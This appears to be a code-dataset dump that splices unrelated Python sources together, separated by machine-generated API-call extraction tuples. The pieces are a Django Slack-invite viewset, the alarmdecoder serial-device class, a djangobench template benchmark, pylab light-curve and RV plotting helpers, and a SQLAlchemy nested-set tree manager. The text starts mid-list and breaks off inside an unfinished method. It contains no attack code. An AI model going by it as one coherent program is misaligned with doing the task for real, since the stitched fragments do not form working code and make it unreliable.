'os.path.exists', 'os.path.exists', (['label_dict_path'], {}), '(label_dict_path)\n', (2360, 2377), False, 'import os\n'), ((2391, 2508), 'utils.logger.info', 'logger.info', (['"""label dictionary is not given, the dictionary is automatically built from the training data."""'], {}), "(\n 'label dictionary is not given, the dictionary is automatically built from the training data.'\n )\n", (2402, 2508), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2660, 2733), 'utils.build_dict', 'build_dict', ([], {'data_dir': 'train_data_dir', 'save_path': 'label_dict_path', 'use_col': '(0)'}), '(data_dir=train_data_dir, save_path=label_dict_path, use_col=0)\n', (2670, 2733), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((4038, 4083), 'paddle.v2.optimizer.L2Regularization', 'paddle.optimizer.L2Regularization', ([], {'rate': '(0.001)'}), '(rate=0.001)\n', (4071, 4083), True, 'import paddle.v2 as paddle\n'), ((4106, 4155), 'paddle.v2.optimizer.ModelAverage', 'paddle.optimizer.ModelAverage', ([], {'average_window': '(0.5)'}), '(average_window=0.5)\n', (4135, 4155), True, 'import paddle.v2 as paddle\n'), ((4253, 4298), 'paddle.v2.evaluator.auc', 'paddle.evaluator.auc', ([], {'input': 'prob', 'label': 'label'}), '(input=prob, label=label)\n', (4273, 4298), True, 'import paddle.v2 as paddle\n'), ((1820, 1850), 'os.path.exists', 'os.path.exists', (['word_dict_path'], {}), '(word_dict_path)\n', (1834, 1850), False, 'import os\n'), ((3031, 3087), 'reader.train_reader', 'reader.train_reader', (['train_data_dir', 'word_dict', 'lbl_dict'], {}), '(train_data_dir, word_dict, lbl_dict)\n', (3050, 3087), False, 'import reader\n'), ((4662, 4775), 'utils.logger.info', 'logger.info', (["('Pass %d, Batch %d, Cost %f, %s\\n' % (event.pass_id, event.batch_id, event\n .cost, event.metrics))"], {}), "('Pass %d, Batch %d, Cost %f, %s\\n' % (event.pass_id, event.\n batch_id, event.cost, event.metrics))\n", (4673, 4775), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((4976, 5047), 'utils.logger.info', 'logger.info', (["('Test at Pass %d, %s \\n' % (event.pass_id, result.metrics))"], {}), "('Test at Pass %d, %s \\n' % (event.pass_id, result.metrics))\n", (4987, 5047), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1691, 1726), 'paddle.v2.dataset.imdb.test', 'paddle.dataset.imdb.test', (['word_dict'], {}), '(word_dict)\n', (1715, 1726), True, 'import paddle.v2 as paddle\n'), ((3446, 3501), 'reader.train_reader', 'reader.train_reader', (['test_data_dir', 'word_dict', 'lbl_dict'], {}), '(test_data_dir, word_dict, lbl_dict)\n', (3465, 3501), False, 'import reader\n'), ((5152, 5227), 'os.path.join', 'os.path.join', (['model_save_dir', "('dnn_params_pass_%05d.tar.gz' % event.pass_id)"], {}), "(model_save_dir, 'dnn_params_pass_%05d.tar.gz' % event.pass_id)\n", (5164, 5227), False, 'import os\n'), ((1551, 1587), 'paddle.v2.dataset.imdb.train', 'paddle.dataset.imdb.train', (['word_dict'], {}), '(word_dict)\n', (1576, 1587), True, 'import paddle.v2 as paddle\n')]
|
import structlog
from rest_framework import exceptions, permissions, status, viewsets
from rest_framework.response import Response
from lego.apps.stats.utils import track
from .serializers import SlackInviteSerializer
from .utils import SlackException, SlackInvite
log = structlog.get_logger()
class SlackInviteViewSet(viewsets.ViewSet):
"""
Invite an email to our slack team.
"""
permission_classes = [permissions.IsAuthenticated]
def create(self, request, *args, **kwargs):
serializer = SlackInviteSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response(serializer.data, status=status.HTTP_201_CREATED)
def perform_create(self, serializer):
email = serializer.validated_data['email']
try:
slack_invite = SlackInvite()
slack_invite.invite(email)
track(self.request.user, 'slack.invite', properties={'email': email})
except SlackException as ex:
log.warn('slack_invite_failed', email=email, exception=str(ex))
raise exceptions.ValidationError({'detail': str(ex)})
|
[
"lego.apps.stats.utils.track",
"rest_framework.response.Response",
"structlog.get_logger"
] |
[((274, 296), 'structlog.get_logger', 'structlog.get_logger', ([], {}), '()\n', (294, 296), False, 'import structlog\n'), ((670, 727), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (678, 727), False, 'from rest_framework.response import Response\n'), ((928, 997), 'lego.apps.stats.utils.track', 'track', (['self.request.user', '"""slack.invite"""'], {'properties': "{'email': email}"}), "(self.request.user, 'slack.invite', properties={'email': email})\n", (933, 997), False, 'from lego.apps.stats.utils import track\n')]
|
"""
This module contains the :py:class:`SerialDevice` interface for the `AD2USB`_, `AD2SERIAL`_ or `AD2PI`_.
.. _AD2USB: http://www.alarmdecoder.com
.. _AD2SERIAL: http://www.alarmdecoder.com
.. _AD2PI: http://www.alarmdecoder.com
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import threading
import serial
import serial.tools.list_ports
import select
import sys
from .base_device import Device
from ..util import CommError, TimeoutError, NoDeviceError, bytes_hack
class SerialDevice(Device):
"""
`AD2USB`_, `AD2SERIAL`_ or `AD2PI`_ device utilizing the PySerial interface.
"""
# Constants
BAUDRATE = 19200
"""Default baudrate for Serial devices."""
@staticmethod
def find_all(pattern=None):
"""
Returns all serial ports present.
:param pattern: pattern to search for when retrieving serial ports
:type pattern: string
:returns: list of devices
:raises: :py:class:`~alarmdecoder.util.CommError`
"""
devices = []
try:
if pattern:
devices = serial.tools.list_ports.grep(pattern)
else:
devices = serial.tools.list_ports.comports()
except serial.SerialException as err:
raise CommError('Error enumerating serial devices: {0}'.format(str(err)), err)
return devices
@property
def interface(self):
"""
Retrieves the interface used to connect to the device.
:returns: interface used to connect to the device
"""
return self._port
@interface.setter
def interface(self, value):
"""
Sets the interface used to connect to the device.
:param value: name of the serial device
:type value: string
"""
self._port = value
def __init__(self, interface=None):
"""
Constructor
:param interface: device to open
:type interface: string
"""
Device.__init__(self)
self._port = interface
self._id = interface
# Timeout = non-blocking to match pyftdi.
self._device = serial.Serial(timeout=0, writeTimeout=0)
def open(self, baudrate=BAUDRATE, no_reader_thread=False):
"""
Opens the device.
:param baudrate: baudrate to use with the device
:type baudrate: int
:param no_reader_thread: whether or not to automatically start the
reader thread.
:type no_reader_thread: bool
:raises: :py:class:`~alarmdecoder.util.NoDeviceError`
"""
# Set up the defaults
if baudrate is None:
baudrate = SerialDevice.BAUDRATE
if self._port is None:
raise NoDeviceError('No device interface specified.')
self._read_thread = Device.ReadThread(self)
# Open the device and start up the reader thread.
try:
self._device.port = self._port
self._device.open()
# NOTE: Setting the baudrate before opening the
# port caused issues with Moschip 7840/7820
# USB Serial Driver converter. (mos7840)
#
# Moving it to this point seems to resolve
# all issues with it.
self._device.baudrate = baudrate
except (serial.SerialException, ValueError, OSError) as err:
raise NoDeviceError('Error opening device on {0}.'.format(self._port), err)
else:
self._running = True
self.on_open()
if not no_reader_thread:
self._read_thread.start()
return self
def close(self):
"""
Closes the device.
"""
try:
Device.close(self)
except Exception:
pass
def fileno(self):
"""
Returns the file number associated with the device
:returns: int
"""
return self._device.fileno()
def write(self, data):
"""
Writes data to the device.
:param data: data to write
:type data: string
:raises: py:class:`~alarmdecoder.util.CommError`
"""
try:
# Hack to support unicode under Python 2.x
if isinstance(data, str) or (sys.version_info < (3,) and isinstance(data, unicode)):
data = data.encode('utf-8')
self._device.write(data)
except serial.SerialTimeoutException:
pass
except serial.SerialException as err:
raise CommError('Error writing to device.', err)
else:
self.on_write(data=data)
def read(self):
"""
Reads a single character from the device.
:returns: character read from the device
:raises: :py:class:`~alarmdecoder.util.CommError`
"""
data = ''
try:
read_ready, _, _ = select.select([self._device.fileno()], [], [], 0.5)
if len(read_ready) != 0:
data = self._device.read(1)
except serial.SerialException as err:
raise CommError('Error reading from device: {0}'.format(str(err)), err)
return data.decode('utf-8')
def read_line(self, timeout=0.0, purge_buffer=False):
"""
Reads a line from the device.
:param timeout: read timeout
:type timeout: float
:param purge_buffer: Indicates whether to purge the buffer prior to
reading.
:type purge_buffer: bool
:returns: line that was read
:raises: :py:class:`~alarmdecoder.util.CommError`, :py:class:`~alarmdecoder.util.TimeoutError`
"""
def timeout_event():
"""Handles read timeout event"""
timeout_event.reading = False
timeout_event.reading = True
if purge_buffer:
self._buffer = b''
got_line, data = False, ''
timer = threading.Timer(timeout, timeout_event)
if timeout > 0:
timer.start()
leftovers = b''
try:
while timeout_event.reading and not got_line:
read_ready, _, _ = select.select([self._device.fileno()], [], [], 0.5)
if len(read_ready) == 0:
continue
bytes_avail = 0
if hasattr(self._device, "in_waiting"):
bytes_avail = self._device.in_waiting
else:
bytes_avail = self._device.inWaiting()
buf = self._device.read(bytes_avail)
for idx in range(len(buf)):
c = buf[idx]
ub = bytes_hack(c)
if sys.version_info > (3,):
ub = bytes([ub])
# NOTE: AD2SERIAL and AD2PI apparently sends down \xFF on boot.
if ub != b'' and ub != b"\xff":
self._buffer += ub
if ub == b"\n":
self._buffer = self._buffer.strip(b"\r\n")
if len(self._buffer) > 0:
got_line = True
leftovers = buf[idx:]
break
except (OSError, serial.SerialException) as err:
raise CommError('Error reading from device: {0}'.format(str(err)), err)
else:
if got_line:
data, self._buffer = self._buffer, leftovers
self.on_read(data=data)
else:
raise TimeoutError('Timeout while waiting for line terminator.')
finally:
timer.cancel()
return data.decode('utf-8')
def purge(self):
"""
Purges read/write buffers.
"""
self._device.flushInput()
self._device.flushOutput()
|
[
"serial.Serial",
"threading.Timer",
"serial.tools.list_ports.grep",
"serial.tools.list_ports.comports"
] |
[((2130, 2170), 'serial.Serial', 'serial.Serial', ([], {'timeout': '(0)', 'writeTimeout': '(0)'}), '(timeout=0, writeTimeout=0)\n', (2143, 2170), False, 'import serial\n'), ((5989, 6028), 'threading.Timer', 'threading.Timer', (['timeout', 'timeout_event'], {}), '(timeout, timeout_event)\n', (6004, 6028), False, 'import threading\n'), ((1075, 1112), 'serial.tools.list_ports.grep', 'serial.tools.list_ports.grep', (['pattern'], {}), '(pattern)\n', (1103, 1112), False, 'import serial\n'), ((1157, 1191), 'serial.tools.list_ports.comports', 'serial.tools.list_ports.comports', ([], {}), '()\n', (1189, 1191), False, 'import serial\n')]
|
import os
from django import template
from djangobench.utils import run_benchmark
def benchmark():
context = template.Context({
'stuff': 'something'
});
t = template.Template('{{ stuff }}')
t.render(context)
run_benchmark(
benchmark,
syncdb = False,
meta = {
'description': 'Render an extremely simple template (from string)',
}
)
|
[
"djangobench.utils.run_benchmark",
"django.template.Context",
"django.template.Template"
] |
[((234, 351), 'djangobench.utils.run_benchmark', 'run_benchmark', (['benchmark'], {'syncdb': '(False)', 'meta': "{'description': 'Render an extremely simple template (from string)'}"}), "(benchmark, syncdb=False, meta={'description':\n 'Render an extremely simple template (from string)'})\n", (247, 351), False, 'from djangobench.utils import run_benchmark\n'), ((114, 154), 'django.template.Context', 'template.Context', (["{'stuff': 'something'}"], {}), "({'stuff': 'something'})\n", (130, 154), False, 'from django import template\n'), ((178, 210), 'django.template.Template', 'template.Template', (['"""{{ stuff }}"""'], {}), "('{{ stuff }}')\n", (195, 210), False, 'from django import template\n')]
|
import numpy as np
import pylab as pl
from gls import sinefitm
from multiplot import dofig, doaxes
fac1 = 100
fac2 = 1
fac3 = 1
ls = ['-','--',':','-.']
mrk = ['.',',','+','x']
col = ['k','c','m','y']
def plotTS(time, y1, y2, y3 = None, figno = 1, discrete = True, \
savefile = None, period = None, xper = False):
'''Plot light and RV curve(s)'''
M, N = np.shape(y1)
if discrete == True:
m1 = np.copy(mrk)
else:
m1 = np.copy(ls)
if (xper == True) * (not(period is None)):
tt = time / period - 0.5
xr = [-0.5,0.5]
xttl = 'phase'
else:
tt = time
xr = np.nanmin(time), np.nanmax(time)
xttl = 'time (days)'
if y3 is None:
ny = 2
else:
ny = 3
ee = dofig(figno, 1, ny, aspect = 1)
ax1 = doaxes(ee, 1, ny, 0, 0)
for i in np.arange(M):
pl.plot(tt, y1[i,:] * fac1, m1[i], c = col[i])
pl.ylabel(r"$\Delta F$ (\%)")
ymin = np.nanmin(y1) * fac1
ymax = np.nanmax(y1) * fac1
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
ax2 = doaxes(ee, 1, ny, 0, 1, sharex = ax1)
for i in np.arange(M):
pl.plot(tt, y2[i,:] * fac2, m1[i], c = col[i])
pl.ylabel(r"$\Delta V$ (m/s)")
ymin = np.nanmin(y2) * fac2
ymax = np.nanmax(y2) * fac2
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
if not(y3 is None):
ax3 = doaxes(ee, 1, ny, 0, 2, sharex = ax1)
for i in np.arange(M):
pl.plot(tt, y3[i,:] * fac2, m1[i], c = col[i])
pl.ylabel(r"$V_{\rm{bis}}$ (m/s)")
ymin = np.nanmin(y3) * fac2
ymax = np.nanmax(y3) * fac2
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
pl.xlabel(xttl)
pl.xlim(xr[0], xr[1])
if savefile: pl.savefig(savefile)
return
def plotPer(time, y1, y2, y3 = None, figno = 2, \
savefile = None, period = None, fmp = 8):
'''Plot light curve and RV amplitude spectra'''
M, N = np.shape(y1)
pmax = 2* (np.nanmax(time) - np.nanmin(time))
if period is None:
dt = np.median(time[1:]-time[:N-1])
pmin = dt * 2.
else:
pmin = period / fmp
nper = 1000
if period is None:
fac = 1.0
else:
fac = period
if y3 is None:
ny = 2
else:
ny = 3
y = np.zeros((M*ny, N))
y[:M,:] = y1
y[M:2*M,:] = y2
if not (y3 is None):
y[2*M:,:] = y3
res = sinefitm(time, y, fmin = 1./pmax, fmax = 1./pmin, \
nfreq = nper)
freq, amps, ampc = res[0], res[2], res[3]
pers = 1.0 / freq
amp = np.sqrt(amps**2 + ampc**2)
amp1 = amp[:M,:]
amp2 = amp[M:2*M,:]
if not (y3 is None):
amp3 = amp[2*M:,:]
ee = dofig(figno, 1, ny, aspect = 1)
ax1 = doaxes(ee, 1, ny, 0, 0)
pl.setp(ax1.get_xticklabels(), visible = False)
pl.ylabel(r"$A_F$ (\%)")
for i in np.arange(M):
pl.plot(fac / pers, amp1[i,:] * fac1, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp1) * fac1)
ax2 = doaxes(ee, 1, ny, 0, 1, sharex = ax1)
pl.ylabel(r"$A_V$ (m/s)")
for i in np.arange(M):
pl.plot(fac / pers, amp2[i,:] * fac2, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp2) * fac2)
if not(y3 is None):
ax3 = doaxes(ee, 1, ny, 0, 2, sharex = ax1)
pl.ylabel(r"$A_{\mathrm{bis}}$ (m/s)")
for i in np.arange(M):
pl.plot(fac / pers, amp3[i,:] * fac3, ls[i], c = col[i])
pl.ylim(0, 1.1 * np.nanmax(amp3) * fac3)
if period is None:
pl.xlabel(r"Frequency (cycles/day)")
else:
pl.xlabel(r"Frequency (cycles/$P_{\mathrm{rot}}^{-1}$)")
if savefile:
pl.savefig(savefile)
return
def plotTSPer(time, y1, y2, y3 = None, figno = [1,2], savefile = [None, None], \
discrete = False, period = None, xper = False, \
fmp = 8):
'''Plot both time series and amplitude spectra for light and RV'''
plotTS(time, y1, y2, y3 = y3, figno = figno[0], discrete = discrete, \
savefile = savefile[0], period = period, xper = xper)
plotPer(time, y1, y2, y3 = y3, figno = figno[1], savefile = savefile[1], \
period = period, fmp = fmp)
return
|
[
"gls.sinefitm",
"numpy.copy",
"numpy.median",
"pylab.ylabel",
"numpy.zeros",
"multiplot.doaxes",
"pylab.plot",
"numpy.nanmin",
"numpy.shape",
"pylab.savefig",
"numpy.arange",
"pylab.ylim",
"pylab.xlabel",
"pylab.xlim",
"multiplot.dofig",
"numpy.nanmax",
"numpy.sqrt"
] |
[((382, 394), 'numpy.shape', 'np.shape', (['y1'], {}), '(y1)\n', (390, 394), True, 'import numpy as np\n'), ((779, 808), 'multiplot.dofig', 'dofig', (['figno', '(1)', 'ny'], {'aspect': '(1)'}), '(figno, 1, ny, aspect=1)\n', (784, 808), False, 'from multiplot import dofig, doaxes\n'), ((821, 844), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(0)'], {}), '(ee, 1, ny, 0, 0)\n', (827, 844), False, 'from multiplot import dofig, doaxes\n'), ((858, 870), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (867, 870), True, 'import numpy as np\n'), ((931, 961), 'pylab.ylabel', 'pl.ylabel', (['"""$\\\\Delta F$ (\\\\%)"""'], {}), "('$\\\\Delta F$ (\\\\%)')\n", (940, 961), True, 'import pylab as pl\n'), ((1050, 1091), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1057, 1091), True, 'import pylab as pl\n'), ((1102, 1137), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(1)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 1, sharex=ax1)\n', (1108, 1137), False, 'from multiplot import dofig, doaxes\n'), ((1153, 1165), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (1162, 1165), True, 'import numpy as np\n'), ((1226, 1256), 'pylab.ylabel', 'pl.ylabel', (['"""$\\\\Delta V$ (m/s)"""'], {}), "('$\\\\Delta V$ (m/s)')\n", (1235, 1256), True, 'import pylab as pl\n'), ((1346, 1387), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1353, 1387), True, 'import pylab as pl\n'), ((1748, 1763), 'pylab.xlabel', 'pl.xlabel', (['xttl'], {}), '(xttl)\n', (1757, 1763), True, 'import pylab as pl\n'), ((1768, 1789), 'pylab.xlim', 'pl.xlim', (['xr[0]', 'xr[1]'], {}), '(xr[0], xr[1])\n', (1775, 1789), True, 'import pylab as pl\n'), ((2007, 2019), 'numpy.shape', 'np.shape', (['y1'], {}), '(y1)\n', (2015, 2019), True, 'import numpy as np\n'), ((2353, 2374), 'numpy.zeros', 'np.zeros', (['(M * ny, N)'], {}), '((M * ny, N))\n', (2361, 2374), True, 'import numpy as np\n'), ((2468, 2531), 'gls.sinefitm', 'sinefitm', (['time', 'y'], {'fmin': '(1.0 / pmax)', 'fmax': '(1.0 / pmin)', 'nfreq': 'nper'}), '(time, y, fmin=1.0 / pmax, fmax=1.0 / pmin, nfreq=nper)\n', (2476, 2531), False, 'from gls import sinefitm\n'), ((2631, 2661), 'numpy.sqrt', 'np.sqrt', (['(amps ** 2 + ampc ** 2)'], {}), '(amps ** 2 + ampc ** 2)\n', (2638, 2661), True, 'import numpy as np\n'), ((2769, 2798), 'multiplot.dofig', 'dofig', (['figno', '(1)', 'ny'], {'aspect': '(1)'}), '(figno, 1, ny, aspect=1)\n', (2774, 2798), False, 'from multiplot import dofig, doaxes\n'), ((2811, 2834), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(0)'], {}), '(ee, 1, ny, 0, 0)\n', (2817, 2834), False, 'from multiplot import dofig, doaxes\n'), ((2891, 2915), 'pylab.ylabel', 'pl.ylabel', (['"""$A_F$ (\\\\%)"""'], {}), "('$A_F$ (\\\\%)')\n", (2900, 2915), True, 'import pylab as pl\n'), ((2929, 2941), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (2938, 2941), True, 'import numpy as np\n'), ((3067, 3102), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(1)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 1, sharex=ax1)\n', (3073, 3102), False, 'from multiplot import dofig, doaxes\n'), ((3109, 3133), 'pylab.ylabel', 'pl.ylabel', (['"""$A_V$ (m/s)"""'], {}), "('$A_V$ (m/s)')\n", (3118, 3133), True, 'import pylab as pl\n'), ((3148, 3160), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (3157, 3160), True, 'import numpy as np\n'), ((433, 445), 'numpy.copy', 'np.copy', (['mrk'], {}), '(mrk)\n', (440, 445), True, 'import numpy as np\n'), ((469, 480), 'numpy.copy', 'np.copy', (['ls'], {}), '(ls)\n', (476, 480), True, 'import numpy as np\n'), ((880, 925), 'pylab.plot', 'pl.plot', (['tt', '(y1[i, :] * fac1)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y1[i, :] * fac1, m1[i], c=col[i])\n', (887, 925), True, 'import pylab as pl\n'), ((972, 985), 'numpy.nanmin', 'np.nanmin', (['y1'], {}), '(y1)\n', (981, 985), True, 'import numpy as np\n'), ((1004, 1017), 'numpy.nanmax', 'np.nanmax', (['y1'], {}), '(y1)\n', (1013, 1017), True, 'import numpy as np\n'), ((1175, 1220), 'pylab.plot', 'pl.plot', (['tt', '(y2[i, :] * fac2)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y2[i, :] * fac2, m1[i], c=col[i])\n', (1182, 1220), True, 'import pylab as pl\n'), ((1268, 1281), 'numpy.nanmin', 'np.nanmin', (['y2'], {}), '(y2)\n', (1277, 1281), True, 'import numpy as np\n'), ((1300, 1313), 'numpy.nanmax', 'np.nanmax', (['y2'], {}), '(y2)\n', (1309, 1313), True, 'import numpy as np\n'), ((1426, 1461), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(2)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 2, sharex=ax1)\n', (1432, 1461), False, 'from multiplot import dofig, doaxes\n'), ((1481, 1493), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (1490, 1493), True, 'import numpy as np\n'), ((1562, 1596), 'pylab.ylabel', 'pl.ylabel', (['"""$V_{\\\\rm{bis}}$ (m/s)"""'], {}), "('$V_{\\\\rm{bis}}$ (m/s)')\n", (1571, 1596), True, 'import pylab as pl\n'), ((1702, 1743), 'pylab.ylim', 'pl.ylim', (['(ymin - 0.1 * yr)', '(ymax + 0.1 * yr)'], {}), '(ymin - 0.1 * yr, ymax + 0.1 * yr)\n', (1709, 1743), True, 'import pylab as pl\n'), ((1807, 1827), 'pylab.savefig', 'pl.savefig', (['savefile'], {}), '(savefile)\n', (1817, 1827), True, 'import pylab as pl\n'), ((2106, 2140), 'numpy.median', 'np.median', (['(time[1:] - time[:N - 1])'], {}), '(time[1:] - time[:N - 1])\n', (2115, 2140), True, 'import numpy as np\n'), ((2951, 3006), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp1[i, :] * fac1)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp1[i, :] * fac1, ls[i], c=col[i])\n', (2958, 3006), True, 'import pylab as pl\n'), ((3170, 3225), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp2[i, :] * fac2)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp2[i, :] * fac2, ls[i], c=col[i])\n', (3177, 3225), True, 'import pylab as pl\n'), ((3314, 3349), 'multiplot.doaxes', 'doaxes', (['ee', '(1)', 'ny', '(0)', '(2)'], {'sharex': 'ax1'}), '(ee, 1, ny, 0, 2, sharex=ax1)\n', (3320, 3349), False, 'from multiplot import dofig, doaxes\n'), ((3360, 3398), 'pylab.ylabel', 'pl.ylabel', (['"""$A_{\\\\mathrm{bis}}$ (m/s)"""'], {}), "('$A_{\\\\mathrm{bis}}$ (m/s)')\n", (3369, 3398), True, 'import pylab as pl\n'), ((3416, 3428), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (3425, 3428), True, 'import numpy as np\n'), ((3583, 3618), 'pylab.xlabel', 'pl.xlabel', (['"""Frequency (cycles/day)"""'], {}), "('Frequency (cycles/day)')\n", (3592, 3618), True, 'import pylab as pl\n'), ((3638, 3694), 'pylab.xlabel', 'pl.xlabel', (['"""Frequency (cycles/$P_{\\\\mathrm{rot}}^{-1}$)"""'], {}), "('Frequency (cycles/$P_{\\\\mathrm{rot}}^{-1}$)')\n", (3647, 3694), True, 'import pylab as pl\n'), ((3720, 3740), 'pylab.savefig', 'pl.savefig', (['savefile'], {}), '(savefile)\n', (3730, 3740), True, 'import pylab as pl\n'), ((649, 664), 'numpy.nanmin', 'np.nanmin', (['time'], {}), '(time)\n', (658, 664), True, 'import numpy as np\n'), ((666, 681), 'numpy.nanmax', 'np.nanmax', (['time'], {}), '(time)\n', (675, 681), True, 'import numpy as np\n'), ((1507, 1552), 'pylab.plot', 'pl.plot', (['tt', '(y3[i, :] * fac2)', 'm1[i]'], {'c': 'col[i]'}), '(tt, y3[i, :] * fac2, m1[i], c=col[i])\n', (1514, 1552), True, 'import pylab as pl\n'), ((1612, 1625), 'numpy.nanmin', 'np.nanmin', (['y3'], {}), '(y3)\n', (1621, 1625), True, 'import numpy as np\n'), ((1648, 1661), 'numpy.nanmax', 'np.nanmax', (['y3'], {}), '(y3)\n', (1657, 1661), True, 'import numpy as np\n'), ((2035, 2050), 'numpy.nanmax', 'np.nanmax', (['time'], {}), '(time)\n', (2044, 2050), True, 'import numpy as np\n'), ((2053, 2068), 'numpy.nanmin', 'np.nanmin', (['time'], {}), '(time)\n', (2062, 2068), True, 'import numpy as np\n'), ((3442, 3497), 'pylab.plot', 'pl.plot', (['(fac / pers)', '(amp3[i, :] * fac3)', 'ls[i]'], {'c': 'col[i]'}), '(fac / pers, amp3[i, :] * fac3, ls[i], c=col[i])\n', (3449, 3497), True, 'import pylab as pl\n'), ((3029, 3044), 'numpy.nanmax', 'np.nanmax', (['amp1'], {}), '(amp1)\n', (3038, 3044), True, 'import numpy as np\n'), ((3248, 3263), 'numpy.nanmax', 'np.nanmax', (['amp2'], {}), '(amp2)\n', (3257, 3263), True, 'import numpy as np\n'), ((3524, 3539), 'numpy.nanmax', 'np.nanmax', (['amp3'], {}), '(amp3)\n', (3533, 3539), True, 'import numpy as np\n')]
|
from sqlalchemy import func
from sqlalchemy.exc import SQLAlchemyError
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import and_
import uuid
import json
from common.database import db
from common.ret_status import RetStatus
class TreeManager:
def __init__(self, model_obj=None, session=None):
self.__model = model_obj
self.__session = session
def get_root_node(self, node_uuid=None, many=False):
tmp_model = self.__model
ret = RetStatus(status=True)
if many:
try:
ret.data = tmp_model.query.filter(tmp_model.root_uuid == tmp_model.node_uuid, tmp_model.parent_uuid == "").all()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
else:
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
ret.data = tmp_model.query.filter(tmp_model.root_uuid == tmp_model.node_uuid, tmp_model.node_uuid == node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return ret
def add_node(self, node_uuid=None, node=None):
tmp_session = self.__session
tmp_model = self.__model
if node is None:
return RetStatus(False, "invalid insert node.")
"""add node as root"""
if node_uuid is None:
node.node_uuid = uuid.uuid1()
node.root_uuid = node.node_uuid
node.parent_uuid = ""
node.left = 0
node.right = 1
try:
tmp_session.add(node)
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
else:
try:
target_node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if target_node is None:
return RetStatus(False, "invalid node uuid.")
else:
"""add node as the last children"""
node.node_uuid = uuid.uuid1()
node.root_uuid = target_node.root_uuid
node.parent_uuid = target_node.node_uuid
node.left = target_node.right
node.right = target_node.right + 1
try:
tmp_model.query.filter(tmp_model.left>target_node.right).update({tmp_model.left:tmp_model.left+2})
tmp_model.query.filter(tmp_model.right>=target_node.right).update({tmp_model.right:tmp_model.right+2})
tmp_session.add(node)
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
"""check node uuid exist"""
def check(self, node_uuid=None):
tmp_model = self.__model
node = None
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
try:
node = tmp_model.query.filter(tmp_model.node_uuid == node_uuid).first()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if node is None:
return RetStatus(False, "nothing be searched.")
return RetStatus(True)
"""delete node and children"""
def delete_node(self, node_uuid=None, node=None ):
tmp_session = self.__session
tmp_model = self.__model
if node:
try:
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>=node.left,tmp_model.right<=node.right).delete()
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>node.right).update({tmp_model.left:tmp_model.left-(node.right-node.left)-1})
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.right>node.right).update({tmp_model.right:tmp_model.right-(node.right-node.left)-1})
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
if node_uuid is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
node = tmp_model.query.filter(tmp_model.node_uuid==node_uuid).one()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
if node is None:
return RetStatus(False, "invalid node uuid.")
else:
try:
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>=node.left,tmp_model.right<=node.right).delete()
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.left>node.right).update({tmp_model.left:tmp_model.left-(node.right-node.left)-1})
tmp_model.query.filter(tmp_model.root_uuid == node.root_uuid, tmp_model.right>node.right).update({tmp_model.right:tmp_model.right-(node.right-node.left)-1})
tmp_session.commit()
except SQLAlchemyError as e:
return RetStatus(False, e.message)
return RetStatus(True)
"""delete multiple nodes"""
def delete_nodes(self, node_uuids=None):
if not isinstance(node_uuids, list):
return RetStatus(False, "invalid node uuids list.")
else:
node_error = []
for uuid in node_uuids:
